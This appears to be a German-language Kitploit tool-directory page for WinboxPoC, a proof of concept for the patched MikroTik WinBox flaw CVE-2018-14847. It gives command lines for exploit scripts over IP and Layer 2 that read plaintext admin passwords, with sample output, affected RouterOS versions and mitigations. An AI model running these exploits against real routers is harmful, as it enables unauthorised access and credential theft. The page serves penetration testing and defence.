Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WinboxPoC — Konzeptnachweis der kritischen Schwachstelle in Winbox (CVE-2018-14847) | Kitploit
Tools/GitHubGitHub/basucert/winboxpoc
PasswortangriffeSchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstestsArchived
GitHubbasucert/winboxpoc

WinboxPoC

Konzeptnachweis der kritischen Schwachstelle in Winbox (CVE-2018-14847)

Repository anzeigen
520461vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

WinboxExploit

Dies ist ein Proof-of-Concept der kritischen WinBox-Sicherheitslücke (CVE-2018-14847), die das Auslesen von Klartext-Passwörtern aus beliebigen Dateien ermöglicht.

Die Sicherheitslücke wurde bereits vor langer Zeit behoben, daher ist dieses Projekt beendet und wird nicht mehr unterstützt oder aktualisiert. Sie können es forken und selbst aktualisieren.

Blogpost

https://n0p.me/winbox-bug-dissection/

Requirements

  • Python 3+

Dieses Skript wird NICHT mit Python 2.x oder niedriger ausgeführt.

How To Use

Das Skript wird einfach mit einfachen Argumenten in der Befehlszeile verwendet.

WinBox (TCP/IP)

Nutzen Sie die Sicherheitslücke aus und lesen Sie das Passwort aus.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Example:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (Layer 2)

Sie können Dateien extrahieren, selbst wenn das Gerät keine IP-Adresse hat.

Einfache Erkennungsprüfung für lokal verbundene Mikrotik-Geräte.

root@kitploit:~
python3 MACServerDiscover.py

Example:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Nutzen Sie die Sicherheitslücke aus und lesen Sie das Passwort aus.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Example:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Vulnerable Versions

Alle RouterOS-Versionen vom 28.05.2015 bis zum 20.04.2018 sind für diesen Exploit anfällig.

Mikrotik-Geräte mit RouterOS-Versionen:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Weitere Informationen finden Sie unter: https://blog.mikrotik.com/security/winbox-vulnerability.html

Mitigation Techniques

  • Aktualisieren Sie den Router auf eine RouterOS-Version, die den Fix enthält.
  • Deaktivieren Sie den WinBox-Dienst auf dem Router.
  • Sie können den Zugriff auf den WinBox-Dienst auf bestimmte IP-Adressen beschränken mit:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Sie können einige Filterregeln (ACL) verwenden, um externen Zugriff auf den WinBox-Dienst zu verweigern:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Der Zugriff auf den mac-winbox-Dienst kann durch Angabe erlaubter Schnittstellen eingeschränkt werden:
root@kitploit:~
/tool mac-server mac-winbox

Copyright

  • Gesponsert vom iranischen CERTCC (https://certcc.ir). Alle Rechte vorbehalten.
Tool herunterladen